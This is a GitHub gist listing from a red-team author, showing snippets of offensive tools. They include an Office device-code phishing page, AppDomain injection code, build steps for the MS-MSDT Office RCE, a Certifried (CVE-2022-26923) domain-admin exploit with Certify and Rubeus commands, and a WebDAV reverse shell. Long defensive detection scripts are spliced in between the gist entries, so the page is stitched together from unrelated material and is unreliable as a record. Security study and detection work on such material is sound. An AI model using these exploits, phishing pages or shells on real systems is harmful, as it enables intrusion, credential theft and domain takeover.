Steve Borosh rvrsh3ll

rvrsh3ll / S3UpDown.ps1
Created August 21, 2022 15:23 — forked from pmolchanov/S3UpDown.ps1
Quick n Dirty S3 Upload/Download for Powershell
# Upload
$ErrorActionPreference = 'Stop'
$AWSRegion = "us-east-1"
$AWSAccessKeyId = "TODO: Access Key"
$AWSSecretAccessKey = "TODO: Secret Access Key"
$BucketName = "TODO: Bucket Name"
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") | Out-Null
$OpenFileDialog = New-Object System.Windows.Forms.OpenFileDialog
$OpenFileDialog.ShowDialog() | Out-Null
rvrsh3ll / generate.html
Created August 1, 2022 01:03 — forked from Mr-Un1k0d3r/generate.html
office device code phishing
<!-- This page can be formatted to look like something more interesting -->
<script src=""></script>
$.get("").done(function(data) {
$.get("" + data.device_code);
rvrsh3ll /
Created June 29, 2022 15:59 — forked from leechristensen/
Useful Cypher queries to find computers that are local admin on other computers, or to find groups containing both users and computers.

Computer accounts added to local admins on machines via a group in the local admins

MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
// .name is the BloodHound node property carrying the principal's display name
RETURN c1.name AS Principal, c2.name AS Target, g1.name AS ViaGroup

Computer accounts added to local admins on machines explicitly

rvrsh3ll / fxstmp.cs
Created June 1, 2022 19:46 — forked from code-scrap/fxstmp.cs
FXSTMP AppDomain Injection. - FXSTHIS!
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
public sealed class MyAppDomainManager : AppDomainManager
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
rvrsh3ll / ms-msdt.MD
Created May 30, 2022 15:24 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references pointing at HTML files. There is a URI scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in its parameters).

The result is a terrifying attack vector for getting RCE by opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
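A triage check for the vector the write-up describes, added here as an example and not part of the forked gist or its author's PoC. It opens the OOXML package, walks every .rels part and reports relationships with TargetMode="External" (flagging the OLE object type the write-up names), and separately scans every part for the "ms-msdt:" scheme. The .docx packages it builds are constructed for this example and contain only the parts the checker reads; the lure URL and the ms-msdt target are placeholders.

```python
"""Triage a .docx for external OLE object references and ms-msdt: use.

Added example, not the gist's code. Sample packages are constructed and
minimal; real .docx files carry many more parts, which the check ignores.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
OLE_REL_TYPE = OOXML_REL + "oleObject"
MSDT_RE = re.compile(rb"ms-msdt:", re.IGNORECASE)


def external_relationships(docx_bytes: bytes) -> list[dict]:
    """One record per externally-targeted relationship in any .rels part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                findings.append({
                    "part": part,
                    "id": rel.get("Id"),
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": target,
                    "external_ole": rel.get("Type") == OLE_REL_TYPE,
                    "msdt_scheme": target.lower().startswith("ms-msdt:"),
                })
    return findings


def parts_mentioning_msdt(docx_bytes: bytes) -> list[str]:
    """Parts whose raw bytes contain the ms-msdt: scheme (hyperlink targets,
    embedded HTML/XML parts). Substring scan, no XML parsing needed."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        return [p for p in zf.namelist() if MSDT_RE.search(zf.read(p))]


def is_suspicious(docx_bytes: bytes) -> bool:
    """True when the package has an external OLE object or any ms-msdt: use."""
    rels = external_relationships(docx_bytes)
    return (any(r["external_ole"] or r["msdt_scheme"] for r in rels)
            or bool(parts_mentioning_msdt(docx_bytes)))


def build_docx(document_rels: str) -> bytes:
    """Constructed minimal package with only the parts the checker reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


def rels_xml(*relationships: str) -> str:
    body = "\n".join(relationships)
    return (f'<?xml version="1.0" encoding="UTF-8"?>\n'
            f'<Relationships xmlns="{REL_NS}">\n{body}\n</Relationships>')


# Constructed samples; the lure host and ms-msdt target are placeholders.
BENIGN_DOCX = build_docx(rels_xml(
    f'<Relationship Id="rId1" Type="{OOXML_REL}image" Target="media/image1.png"/>',
))
EXTERNAL_OLE_DOCX = build_docx(rels_xml(
    f'<Relationship Id="rId1" Type="{OOXML_REL}image" Target="media/image1.png"/>',
    f'<Relationship Id="rId2" Type="{OLE_REL_TYPE}" '
    'Target="http://lure.example.invalid/payload.html" TargetMode="External"/>',
))
MSDT_LINK_DOCX = build_docx(rels_xml(
    f'<Relationship Id="rId1" Type="{OOXML_REL}hyperlink" '
    'Target="ms-msdt:/id Example" TargetMode="External"/>',
))

if __name__ == "__main__":
    for label, blob in [("benign", BENIGN_DOCX), ("external OLE", EXTERNAL_OLE_DOCX),
                        ("ms-msdt link", MSDT_LINK_DOCX)]:
        print(f"{label}: suspicious={is_suspicious(blob)}",
              external_relationships(blob), parts_mentioning_msdt(blob))
```

Point `build_docx`'s caller at a real file (`is_suspicious(open(path, "rb").read())`) to use it on mail attachments. The check deliberately reads every .rels part, not just document.xml.rels, because headers, footers and embedded parts carry their own relationship files; a clean result only says the package itself carries no external OLE reference, it says nothing about what an external target would serve.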
rvrsh3ll /
Created May 17, 2022 01:16 — forked from tothi/
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from a non-privileged user, with the requirement of adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP together with Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (i.e. ownership of) that machine. Combining the two: a non-privileged domain user escalates to Domain Admin without the requirement of adding or owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.


rvrsh3ll / Program.cs
Created May 12, 2022 11:45 — forked from dmchell/Program.cs
Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
// Author: @domchell - MDSec
// This exploit can be used to update the relevant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :)
// Steps:
// 1. Escalate on any workstation (hint: krbrelayup ftw)
// 2. Execute UpdateMachineAccount.exe as SYSTEM
// 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp)
// 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256)
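The detection side of the two Certifried gists above (the KrbRelayUp combination and this exploit), added here as an example and not the exploit author's code. The gist only says the exploit "updates the relevant AD attributes"; the attribute Certifried rewrites is dNSHostName, which the CA copies into the certificate subject (the /subject:CN=dc.evil.corp step). Because the attack works from an existing machine account, the note that MS-DS-Machine-Account-Quota does not stop it also means the audit has to cover every computer object, not just newly created ones. The check below flags a computer whose dNSHostName does not match its own sAMAccountName, or that shares a dNSHostName with another account. The records are constructed to look like LDAP results for (objectClass=computer) in the gist's evil.corp domain; a real run would pull sAMAccountName and dNSHostName with an LDAP search.

```python
"""Audit computer accounts for the dNSHostName tampering behind CVE-2022-26923.

Added example, not the gist's code. dNSHostName is the attribute the
exploit rewrites (the gist does not name it). COMPUTERS is a constructed
stand-in for an LDAP result set.
"""
from collections import defaultdict


def expected_dns_hostname(sam_account_name: str, dns_domain: str) -> str:
    """Machine accounts are 'HOST$'; the matching FQDN is host.<domain>."""
    return f"{sam_account_name.rstrip('$').lower()}.{dns_domain.lower()}"


def find_hostname_anomalies(computers: list[dict], dns_domain: str) -> list[dict]:
    """Return one finding per mismatch or collision, in input order."""
    owners = defaultdict(list)  # dNSHostName -> accounts claiming it
    for c in computers:
        dns = (c.get("dNSHostName") or "").lower()
        if dns:
            owners[dns].append(c["sAMAccountName"])

    findings = []
    for c in computers:
        sam = c["sAMAccountName"]
        dns = (c.get("dNSHostName") or "").lower()
        if not dns:
            continue  # no hostname to enroll with, and nothing to compare
        if dns != expected_dns_hostname(sam, dns_domain):
            findings.append({"account": sam, "dNSHostName": dns,
                             "reason": "dNSHostName does not match sAMAccountName"})
        others = [o for o in owners[dns] if o != sam]
        if others:
            findings.append({"account": sam, "dNSHostName": dns,
                             "reason": f"dNSHostName also claimed by {', '.join(others)}"})
    return findings


# Constructed records: WS02$ has had its dNSHostName rewritten to the DC's.
COMPUTERS = [
    {"sAMAccountName": "DC$",   "dNSHostName": "dc.evil.corp"},
    {"sAMAccountName": "WS01$", "dNSHostName": "ws01.evil.corp"},
    {"sAMAccountName": "WS02$", "dNSHostName": "dc.evil.corp"},
    {"sAMAccountName": "WS03$", "dNSHostName": None},
]

if __name__ == "__main__":
    for f in find_hostname_anomalies(COMPUTERS, "evil.corp"):
        print(f"{f['account']:8} {f['dNSHostName']:20} {f['reason']}")
```

The DC's own account is reported too when a collision exists, which is intended: the defender wants to know which legitimate host is being impersonated, not only which account was tampered with. Run the check on a schedule and alert on any new finding; the attribute change itself is a single LDAP write and leaves little else behind.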
rvrsh3ll / JEWebDav.ps1
Created May 10, 2022 16:20 — forked from darkquasar/JEWebDav.ps1
Simple WebDav Server in Powershell
Obtained from
Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback.
Read And Write Files Over WebDAV Proof Of Concept
rvrsh3ll / PowerView-3.0-tricks.ps1
Created March 4, 2022 15:28 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
rvrsh3ll /
Created February 26, 2022 16:38 — forked from tonykarre/
Dynamically create S3 buckets to stage pen test tools/payloads. Files can only be downloaded by the target.
#! /bin/bash
# Tony Karre
# @tonykarre
# Use case:
# You are executing a pen test, and you want to temporarily stage payloads and other tools
# on a server outside of your own infrastructure. You also want to make sure that